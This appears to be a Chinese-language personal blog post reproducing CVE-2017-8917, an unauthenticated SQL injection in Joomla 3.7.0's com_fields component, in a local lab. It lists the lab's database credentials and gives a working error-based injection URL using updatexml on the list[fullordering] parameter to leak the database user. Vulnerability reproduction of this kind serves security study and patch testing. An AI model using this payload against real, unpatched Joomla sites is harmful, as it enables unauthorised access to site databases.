joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

发表于 2021-08-23 | 分类于漏洞复现 |

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

com_fields组件出现漏洞，com_fields组件是在3.7版本添加的，如果你使用此版本，将受到影响，并应尽快更新。这个组件可以公开访问，意味着任何能访问你站点的用户都可以发起攻击。

Joomla于5月17日发布了新版本3.7.1,（https://www.joomla.org/announcements/release-news/5705-joomla-3-7-1-release.html），本次更新中修复一个高危SQL注入漏洞（https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html），成功利用该漏洞后攻击者可以在未授权的情况下进行SQL注入。

漏洞复现

启动后访问http://192.168.44.132:8080即可看到Joomla的安装界面，当前环境的数据库信息为：

数据库地址：mysql:3306
用户：root
密码：root
数据库名：joomla

填入上述信息，正常安装即可。

安装完成后，访问http://192.168.44.132:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)，即可看到报错信息：

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2021/08/23/Joomla%203.7.0%20(CVE-2017-8917)%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%